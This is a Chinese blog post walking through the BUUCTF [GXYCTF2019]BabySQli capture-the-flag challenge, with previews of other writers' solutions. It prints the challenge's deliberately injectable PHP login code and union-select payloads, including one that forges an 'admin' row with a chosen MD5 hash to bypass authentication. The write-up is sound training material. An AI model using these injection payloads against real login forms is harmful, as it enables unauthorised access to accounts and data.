BUUCTF[GXYCTF2019]BabySQli

已于 2024-06-15 18:48:42 修改
阅读量247 收藏 3
点赞数 6
分类专栏: BUUCTF 文章标签: php 网络安全 web安全 密码学 sql
于 2024-06-15 18:38:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/firecjh/article/details/139706378
版权

[GXYCTF2019]BabySQli

wp

判断注入点,并找到注入方法

进来页面发现有一个登录框,输入admin,admin抓包

发现返回wrong pass!,存在用户名admin,而且是post注入,发送到repeater发送查看回显,发现注释中存在base32编码

进行解码发现,还有一层base64编码

继续解码,发现注入点name

name输入admin'发现报错,说明是字符型注入

输入关键字,看哪些关键字被过滤了

or,=,(,)

还能查询字段数,发现存在三个字段数

'union select 1#

'union select 1,2#

'union select 1,2,3#

由于页面没有回显,猜测三个字段数对应具体字符串,现在不知道1,2,3都对应什么,但前面知道用户名admin,尝试替换admin找到用户名位置,由于用户名在数据库中存在,是字符串,所以用的时候要加'',发现2处是用户名

查看源码,在search.php中发现关键代码

 

<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>Do you know who am I?</title>
<?php
require "config.php";
require "flag.php";

// 去除转义
if (get_magic_quotes_gpc()) {
    function stripslashes_deep($value)
    {
        $value = is_array($value) ?
        array_map('stripslashes_deep', $value) :
        stripslashes($value);
        return $value;
    }

    $_POST = array_map('stripslashes_deep', $_POST);
    $_GET = array_map('stripslashes_deep', $_GET);
    $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
    $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}

mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);


if(preg_match("/\(|\)|\=|or/", $name)){
    die("do not hack me!");
}
else{
    if (!$result) {
        printf("Error: %s\n", mysqli_error($con));
        exit();
    }
    else{
        // echo '<pre>';
        $arr = mysqli_fetch_row($result);
        // print_r($arr);
        if($arr[1] == "admin"){
            if(md5($password) == $arr[2]){
                echo $flag;
            }
            else{
                die("wrong pass!");
            }
        }
        else{
            die("wrong user!");
        }
    }
}

?>
 

分析代码可知我们想要获取flag需要满足两个条件:
 

$arr[1] == "admin"
 

md5($password) == $arr[2]
 

mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
-->
$result = mysqli_query($con, $sql);
-->
$arr = mysqli_fetch_row($result);

        if($arr[1] == "admin"){
            if(md5($password) == $arr[2]){
                echo $flag;
            }
            else{
                die("wrong pass!");
            }
        }
        else{
            die("wrong user!");
        }
 

筛选有用的代码,发现代码赋值$result时使用了mysqli_query()函数,这个函数用于执行某个针对数据库的查询并且规定只能查询字符串,证明了上面的猜测,从代码中可以发现$arr使用了mysqli_fetch_row函数,将所有返回结果作为枚举数组,所有返回结果又是从数据库中查询出来的,说明数组的值和数据库的值相同,那么查询数据库的值时也相当于在查数组的值,由于之前返回了联合查询时返回了wrong pass!,可以说$arr[1]的值为admin,也就是说$arr[1]对应1,2,3中的2,那$arr[2]就对应1,2,3中的3,那我们只需要让md5($password)等于1,2,3中的3即可返回flag,构造payload
 

name='union select 1,'admin','21232f297a57a5a743894a0e4a801fc3'#&pw=admin
 

发现成功返回flag
 


                

        

        

    




            

                    
            

    

      

        

            

              
                
                  像雾若雨又如风
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    6
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    3
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
BuuCTFBabySQL  WP

				
			

			

				

					weixin_51019270的博客
				

				

					01-11
					
					226
					
				

			

		

		

			
				
BuuCTFBabySQL  WP
一:判断闭合条件
在用户名的位置输入1’显示错误,说明是单引号闭合。开始构造------》
二:构造开始
构造几遍以后构造出可以得到有用信息的网页

看报错信息可以知道,我们的or被屏蔽掉了,去网上查了一下,是被replace给替换成空白字符了。
根据前两题的经验,猜测列数是3。直接上联合查询看能不能报显示位。

成功以后直接老办法,爆库,爆表,爆列。flag还是在password的最后一个。直接上图了



拿到flag。提交然后结束。

...

			
		

	



                

              
                



	

		

			

				
					
BUUCTF逆向前八题

				
			

			

				

					01-24
				

			

		

		

			
				
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。  1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...

			
		

	



                


  
              

                


	

		

			

				
					
buuctf babysqli

				
			

			

				

					weixin_55567437的博客
				

				

					07-15
					
					110
					
				

			

		

		

			
				
从这条信息可以知道这是base32码,解码得到一个base64码



解码得到一个:


select * from user where username = '".$name."'


不能得到有用的信息但通过题目源码得知password被md5加密了





所以得找个办法绕过加密。构建一个payload虚拟身份绕过审核机制。

通过burp suite 并构建一个name=1' union select 1,'admin','.......'#pw=123

'......'就是123的...

			
		

	





	

		

			

				
					
buuctf BabySQli

				
			

			

				

					qq_44111753的博客
				

				

					01-02
					
					1033
					
				

			

		

		

			
				
随便输入,发现一串密文,数字+大写字母,大概是采用base32加密

base32解密如下,有“=”,猜测是base64加密

base64解密如下
查询后台数据库username等于输入值得所有数据
后台数据库的登录逻辑大概是:将输入的用户名与后台数据库中的所有用户名做比较,找出相等的,然后用这组数据的密码与用户输入的密码作比较,若相等,则登录成功
重要点:放置于后台的数据库大概率是经过hash加密的
操作:在用户名框注入
1’ union select ‘admin’,加密后的密码
为了使登录成功,注入

			
		

	



		

			
		



	

		

			

				
					
buuctf-BabySQli

				
			

			

				

					m0_62094846的博客
				

				

					03-25
					
					283
					
				

			

		

		

			
				
POST传参,先随便传入几个值,用bp查看



尝试后发现or等很多都被过滤了,但是可以用select,判断字段数





说明有3个字段

,

源代码中有加密代码,看着这纯大写+数字,就猜是base32,用base32解密,再用base64解密可以得到



这是sql查询语句,说明主要的查询对象是name而不是pw

看别人的wp,name是admin



之前是wrong user现在变成wrong pass

说明user是正确的

把它带入查询语句





发现只有admin在...

			
		

	





	

		

			

				
					
BUUCTFBabySQli[GXYCTF2019]

				
			

			

				

					金 帛的博客
				

				

					05-06
					
					564
					
				

			

		

		

			
				
BUUCTF的WP

			
		

	





	

		

			

				
					
BasicASM.s(BUUCTF

				
			

			

				

					06-04
				

			

		

		

			
				
分析过程文件

			
		

	





	

		

			

				
					
BUUCTF-PWN-[ZJCTF 2019]Login

				
			

			

				

					07-10
				

			

		

		

			
				
BUUCTF-PWN-[ZJCTF 2019]Login

			
		

	





	

		

			

				
					
BUUCTFweb之强网杯2019随便注

				
			

			

				

					12-14
				

			

		

		

			
				
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...

			
		

	





	

		

			

				
					
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分

					
最新发布

				
			

			

				

					04-09
				

			

		

		

			
				
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分

			
		

	





	

		

			

				
					
authorware经典作品

				
			

			

				

					03-09
				

			

		

		

			
				
authorware 端午节 转场 精彩 优秀 作品,包含代码 很容易作为模板使用,

			
		

	





	

		

			

				
					
buuctf [GXYCTF2019]BabySQli

				
			

			

				

					weixin_43152809的博客
				

				

					10-14
					
					899
					
				

			

		

		

			
				
今日份习题
名字叫babysqli
主界面是一个登陆页面,看起来好像不难的亚子
开搞!

通过尝试发现or,=,()都被过滤了
输入的时候,一个是wrong user,一个是wrong pass,尝试抓了一下包
发现了一串奇怪的字符串,尝试base64加密,失败了,我以为出题人坑我呢。。。
好在在题目的主界面发现了一个GitHub的网址
进去后发现了题目的源码

主要点在这里:

select * from user where username = '".$name."'

password被md5加密


			
		

	





	

		

			

				
					
BUUCTF之[GXYCTF2019]BabySQli

				
			

			

				

					weixin_44632787的博客
				

				

					10-03
					
					2405
					
				

			

		

		

			
				
题目

这题看到这个页面,而且题目上说的。给人的感觉就是个SQL注入题。。。。
启动BurpSuite抓包看看

有两个可疑点:

一是报用户错误(wrong user!),通常如果有这种错误的时候要先爆破账号,得到正确的账号后再去爆破密码。
这里返回的绿色部分明显是加密后的数据

首先提取绿色部分的信息,经过排查发现可以先base32解密,再base64
原数据:
MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3C

			
		

	





	

		

			

				
					
BUUCTF:[GXYCTF2019]BabySQli

				
			

			

				

					fcz___的博客
				

				

					03-23
					
					232
					
				

			

		

		

			
				
所以我们去哈希一下123得202cb962ac59075b964b07152d234b70。可以看到数据库为:information_schema和web_sqli。根据经验我们应该爆破第二个。可以看到是以post方法传参。随便输入一个用户名和密码,然后bp抓包。把这个文件托进kali里然后打开终端,用sqlmap扫描数据库。我们把这个页面全部复制,创建一个txt文件粘贴进去。然后你会发现这个md5碰撞不出来。可以看到爆出的表名为:user。这个文件路径就输入你的路径。

			
		

	





	

		

			

				
					
BUUCTF——[GXYCTF2019]BabySQli

				
			

			

				

					Ho1aAs‘s Blog
				

				

					05-27
					
					1179
					
				

			

		

		

			
				
文章目录利用点解题分析完
利用点

SQL字符型注入
UNION SELECT联合查询特性

解题
search.php的注释发现hint
<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->

先base32再base64
select * from user where username = '$name'

明白了查询语句,先试试admi

			
		

	





	

		

			

				
					
[BUUCTF]BabySQli (writeup)

				
			

			

				

					weixin_63306244的博客
				

				

					06-27
					
					177
					
				

			

		

		

			
				
所以就要像 [GXYCTF2019]Ping Ping Ping 那样用rename来提取出来。这个表不能和其他会话共享直到HANDLER ... CLOSE。语句会打开一个表,使其能够用后续的HANDLER ... READ。但是发现是不行的,不过更确定了flag在这里面。光看这个文件名就可以知道flag在这里面。但是开头就看到了他将rename过滤。是用堆叠注入,然后看这题过滤的东西。得到了FlagHere这个文件。那就直接 order by。所以要用另一种办法,那就是。发现爆了一些过滤的字符。

			
		

	





	

		

			

				
					
BUUCTF [GXYCTF2019]BabySQli 1

				
			

			

				

					lzu_lfl的博客
				

				

					10-06
					
					356
					
				

			

		

		

			
				
union联合查询生成虚拟数据

			
		

	





	

		

			

				
					
union的特性注入--buuctf babysqli

				
			

			

				

					weixin_51313108的博客
				

				

					08-22
					
					273
					
				

			

		

		

			
				
union特性注入前言union的特性例题buuctf--babysql查看源码
前言
可以利用union特性注入的ctf题其实后端代码要求与往常代码不一样,一般的注入方法并不能对后端造成攻击,要攻破SQL数据库要利用好union的特性。
union的特性
union(联合的特性),看一个例子
select * from tb_user where username='admin' union select 1, 'admin','mochu7'
union在保证字段数相同的情况下联合查询一个不存在的数据时

			
		

	





	

		

			

				
					
buuctf 极客大挑战2019php

				
			

			

				

					08-24
				

			

		

		

			
				
buuctf 极客大挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的展示等。序列化是指将对象转化为字符串的过程,而反序列化则是将字符串转化为对象的过程。在PHP中,可以使用serialize()函数进行序列化,并使用var_dump()函数进行反序列化结果的展示。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
-  *1* [阿里云IoT极客创新挑战赛.pdf](https://download.csdn.net/download/weixin_38744375/11634853)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"]
-  *2* *3* [【BUUCTF-Web】 [极客大挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"]
[ .reference_list ]

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值